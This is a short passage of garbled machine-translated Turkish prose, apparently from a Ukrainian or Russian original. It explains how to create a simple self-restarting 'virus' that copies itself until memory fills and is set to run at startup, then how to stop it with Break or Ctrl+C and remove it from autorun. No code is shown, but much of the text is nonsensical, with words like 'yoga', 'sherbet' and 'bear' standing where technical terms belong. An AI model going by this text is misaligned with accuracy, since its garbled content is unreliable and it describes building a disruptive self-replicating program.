Qi 7 satırında yer alan virüse sens - ana virüsü yaratın, yogayı koruyun ve yogayı güvenli hale getirin Postiynu çalışması. Ve ayrıca takipçinizi yerleştirin. Ve ana virüsü ne öldürür? Ana virüsü başlattıktan sonra, içine girilen komutu kazanın. Ve tüm ekip, kendi çizgisinde, yine kendini yeniden başlatan virüsümüzü başlatır. Ve böylece tutarsızlık noktasına.

Bu tür virüslerle nasıl savaşılır?

İlk etapta cim virüsü ile mücadelenin koçanı şerbet başladıktan sonra başlayacak. Er ya da geç virüs, operasyonel belleğin kopyalarıyla dolacak ve bir ayı çalmasını sağlayamayacaksınız. Bu nedenle, böyle bir performansın şaşırtılması gerekir. Kimler için klavyedeki Break düğmesi mükemmeldir. Stiltki'yi kabartmak için skіlki'ye ihtiyaç var, böylece yeni kopyaların oluşturulması durduruldu. Break butonu olmayan klavyelerde bunun yerine Ctrl + C tuşunu kullanabilirsiniz.

Böyle bir virüs nasıl kaldırılır?

Otomatik ilerlemede yogo kaydı aracılığıyla yapabilirsiniz (istekler için rapor). Ayrıca, komut yorumlayıcısının penceresinde görünür olacakmışsınız gibi, komut üzerine virüsü de girebilirsiniz. Doğal olarak ekteki sistem dosyasına ulaşabilirsiniz. Böyle bir rütbenin ekseni basit bir virüsün yaratılmasıdır.